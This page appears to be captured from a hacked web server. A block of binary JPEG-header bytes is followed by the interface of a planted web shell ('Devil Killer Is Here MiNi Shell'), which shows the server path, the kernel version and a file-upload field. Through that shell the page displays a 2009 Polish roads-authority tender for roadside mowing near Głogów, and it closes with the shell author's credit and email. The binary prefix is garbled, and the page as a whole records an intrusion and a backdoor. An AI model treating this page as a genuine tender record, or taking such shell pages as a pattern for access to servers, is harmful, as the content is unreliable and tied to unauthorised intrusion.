JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090331/84576-N-2009.html

<p class="kh_header"><b>Wrocław: Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg krajowych nr 3, 12, 18, 94 i A-18 administrowanych przez Rejon w Głogowie</b><br>
<b>Numer ogłoszenia: 84576 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział we Wrocławiu , ul. Powstańców Śląskich 186, 53-139 Wrocław, woj. dolnośląskie, tel. 071 3347370, faks 071 334 73 63, 367 17 69.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg krajowych nr 3, 12, 18, 94 i A-18 administrowanych przez Rejon w Głogowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg krajowych nr 3, 12, 18, 94 i A-18 administrowanych przez Rejon w Głogowie w podziale na następujące części :
Część 1 - obejmująca: Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg nr 3 i 12.
Zakres :  
1. Mechaniczne koszenie traw:
	- pierwsze koszenie 556 231,0 m2,
	- drugie i trzecie koszenie 557 002,0 m2,
	- czwarte  koszenie wraz z wycinką odrostów krzewów 1 559 554,0 m2.
2. Pielęgnacja żywopłotów 21.264,0 mb dwukrotnie w ciągu roku.
3. Pielęgnacja drzew z użyciem podnośnika oraz okrzesywanie pni według wskazań 160 szt.,
4. Wycinka drzew według określonych średnic 162 szt.
5. Nasadzenie drzew - 175 szt.

Część 2 - obejmująca: Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg nr 18, 94 i A-18.
Zakres :  
1. Mechaniczne koszenie traw:
	- pierwsze koszenie 327 081,0 m2,
	- drugie koszenie 930 545,0 m2,
2. Pielęgnacja drzew z użyciem podnośnika oraz okrzesywanie pni według wskazań 40 szt.
3. Wycinka drzew według określonych średnic 83 szt.
4. Nasadzenie drzew w ciągu drogi nr 94 - 45 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 14.000,00 PLN, odpowiednio dla:
a.	Części 1 -10.000,00 PLN (słownie złotych: dziesięć tysięcy  złotych 00/100),
b.	Części 2 -4.000,00 PLN (słownie złotych: cztery tysiące  złotych 00/100).
 
	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub
              kilku  następujących formach, w zależności od wyboru Wykonawcy:
a.	pieniądzu, przelewem na rachunek bankowy: 
	w Kredyt Bank SA IV O/Wrocław,
	nr 43 1500 1793 1217 9002 3658 0000,
b.	poręczeniach bankowych;
c.	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d.	gwarancjach bankowych;
e.	gwarancjach ubezpieczeniowych;
f.	     poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5
	     pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji 
       Rozwoju Przedsiębiorczości (t. jedn. Dz. U. z 2007 r. Nr 42, poz. 275).

     Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w
             oryginale i  musi obejmować cały okres związania ofertą.
    Wadium wniesione w pieniądzu przelewem na wskazany rachunek bankowy musi wpłynąć do  Zamawiającego najpóźniej przed  upływem terminu składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Potencjał ekonomiczno-finansowy 
Wykonawca musi wykazać: 
 posiadanie środków finansowych  lub zdolności kredytowej w wysokości nie 
mniejszej niż  dla Części 1 -50 000 PLN i dla Części 2 - 20 000 PLN.
 Potencjał kadrowy 
Wykonawca musi mieć do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi do funkcji, jakie zostaną im powierzone lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia tych osób. Wykonawca przedstawi w ofercie osoby, na każdą z Części wymienioną  poniżej, które spełniają następujące wymagania: 
1)	osoba proponowana do pełnienia funkcji Koordynatora:
a)	minimalna liczba osób: 1,
b)	minimalne doświadczenie i kwalifikacje: 3 lata doświadczenia przy realizacji zadań polegających na koszeniu traw i utrzymaniu zieleni przydrożnej w zakresie wycinki, pielęgnacji i nasadzeniu drzew. 
Od osób wskazanych na stanowiska Koordynatora nie wymaga się, aby posiadały uprawnienia budowlane. 
2)	pracownicy:
a)	Operator kosiarki doczepnej (bijakowej/wysięgnikowej), minimalna liczba osób 2, wymagane posiadanie uprawnień do obsługi sprzętu,
b)	Operator kosiarki spalinowej, minimalna liczba osób 2, wymagane posiadanie uprawnień do obsługi sprzętu,
c)	Operator piły spalinowej, minimalna liczba osób 2, wymagane posiadanie uprawnień do obsługi sprzętu.
 
Potencjał techniczny
Wykonawca musi dysponować narzędziami i urządzeniami oraz środkami transportu, wymienionymi  poniżej lub przedstawić pisemne zobowiązanie innych podmiotów do ich udostępnienia:
Odpowiednio dla Część 1 i dla Części 2: 
	Kosiarka doczepna do ciągnika (bijakowa)	1 szt.,
	Kosiarka wysięgnikowa doczepna do ciągnika	1 szt.,
	Unimog lub inny sprzęt umożliwiający koszenie wysokich skarp	1 szt.,
	Kosiarka spalinowa	3 szt.,
	Platforma z balustradą na podnośniku samochodowym	1 szt.,
	Piła łańcuchowa spalinowa	2 szt.,
	Urządzenie do rozdrabniania gałęzi (rębak)	1 szt.,
	Urządzenie do frezowania pni drzew	1 szt.,
	Samochód ciężarowy ład. 3-5 ton lub ciągnik z przyczepą	1 szt.,
	Samochód dostawczy	1 szt.,
	Zestaw znaków drogowych do prowadzenia prac w pasie drogowym	1 zestaw.
	
Doświadczenie 
Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) co najmniej:
Część 1 : 2 zadania polegające na koszeniu traw, każde o wartości nie mniejszej niż 50 tys. zł.  
               2 zadania polegające na utrzymaniu zieleni przydrożnej w zakresie wycinki, pielęgnacji i nasadzenia drzew   każde o wartości nie mniejszej niż 50 tys. zł. 

Część 2 : 1 zadanie polegające na koszeniu traw o wartości nie mniejszej niż 50 tys. zł.                 1 zadanie polegające na  utrzymaniu zieleni przydrożnej w zakresie wycinki, pielęgnacji i nasadzenia drzew każde o wartości nie mniejszej niż 50 tys. zł. 
Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne/konsorcja)
W przypadku tych Wykonawców, żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 i ust. 2 ustawy Pzp, natomiast warunki określone w pkt III.2)  muszą spełniać łącznie.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie art. 24 ustawy Pzp. Podstawą oceny spełniania warunków będą w szczególności wymagane dokumenty i oświadczenia, o których mowa w pkt III.2), na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> DOKUMENTY I OŚWIADCZENIA WYMAGANE DLA POTWIERDZENIA SPEŁNIANIA PRZEZ WYKONAWCÓW WARUNKÓW

1. Dla potwierdzenia spełnienia warunków, określonych w art. 24 ust. 1 pkt 1)-9) ustawy Pzp, Wykonawcy powinni przedłożyć niżej wymienione dokumenty: 
a) Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodne z treścią Formularza 3.1.
b) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

2.	Na potwierdzenie spełniania warunków opisanych w pkt III.2) Wykonawcy powinni przedłożyć następujące dokumenty:

a) Informację banku, lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą, że wysokość posiadanych środków finansowych lub zdolność kredytowa Wykonawcy jest nie mniejsza od określonej w pkt III.2). Powyższe dokumenty muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
b) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą 
uczestniczyć w wykonywaniu zamówienia na formularzu zgodnym z treścią Formularza 3.3. (Potencjał kadrowy). Wykaz musi zawierać dane na temat kwalifikacji wskazanych osób, potwierdzające spełnienie warunku, o którym mowa w pkt III.2). Do informacji winny być dołączone kopie uprawnień (przez uprawnienia - rozumie się uprawnienia do obsługi określonego rodzaju sprzętu). 
W przypadku, gdy wykonawca wskaże w wykazie osoby, którymi nie będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.
c) Wykaz środków transportu i urządzeń , którymi dysponuje lub będzie dysponował wykonawca (Potencjał techniczny) wymaganych dla realizacji przedmiotu zamówienia, zgodnym z treścią Formularza 3.4. Wykaz musi potwierdzać spełnienie warunku, o którym mowa w pkt III.2).
W przypadku, gdy wykonawca wskaże w wykazie narzędzia i urządzenia i środki transportu, którymi nie będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych narzędzi i urządzeń i środki transportu.
d) Informację o doświadczeniu Wykonawcy (Doświadczenie zawodowe), zgodną z treścią Formularza 3.5. Informacja musi potwierdzać spełnienie warunku, o którym mowa w pkt III.2). Do informacji powinny być dołączone dokumenty z podaniem daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że wymienione w informacji usługi/roboty zostały wykonane należycie.
3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
1)	w pkt 1.b) - składa dokument lub dokumenty, wystawione w kraju, w którym ma on siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 3., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

5.	Dokumenty, o których mowa w pkt 3. i 4. powinny być wystawione nie wcześniej niż odpowiadające im dokumenty określone w pkt 1.b).

6.	Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawców warunków winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Potwierdzenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątka osoby poświadczającej kopię dokumentu za zgodność z oryginałem). Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. 

7.	W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a)	oświadczenie wymienione w pkt 1.a) powinno być złożone w imieniu wszystkich Wykonawców;
b)	dokumenty wymienione w pkt 1.b) albo odpowiadające im określone w pkt 3. i 4., powinny być złożone przez każdego Wykonawcę; 
c)	dokumenty wymienione w pkt 2. mogą dotyczyć dowolnego spośród wykonawców składających wspólna ofertę ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www: gddkia.gov.pl  Oddział we Wrocławiu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg krajowych i Autostrad Oddział we Wrocławiu Rejon w Głogowie, 67-200 Głogów, ul. Mickiewicza 61.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2009 godzina 09:30, miejsce: siedziba Rejonu pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg nr 3 i 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg nr 3 i 12.
Zakres :  
1. Mechaniczne koszenie traw:
	- pierwsze koszenie 556 231,0 m2
	- drugie i trzecie koszenie 557 002,0 m2
	- czwarte  koszenie wraz z wycinką odrostów krzewów 1 559 554,0 m2.
2. Pielęgnacja żywopłotów 21.264,0 mb dwukrotnie w ciągu roku.
3. Pielęgnacja drzew z użyciem podnośnika oraz okrzesywanie pni według wskazań 160 szt.,
4. Wycinka drzew według określonych średnic 162 szt.
5. Nasadzenie drzew - 175 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg nr 18, 94 i A-18.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszenie traw i utrzymanie zieleni przydrożnej w ciągu dróg nr 18, 94 i A-18.
Zakres :  
1. Mechaniczne koszenie traw:
	- pierwsze koszenie 327 081,0 m2
	- drugie koszenie 930 545,0 m2
2. Pielęgnacja drzew z użyciem podnośnika oraz okrzesywanie pni według wskazań 40 szt.
3. Wycinka drzew według określonych średnic 83 szt.
4. Nasadzenie drzew w ciągu drogi nr 94 - 45 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com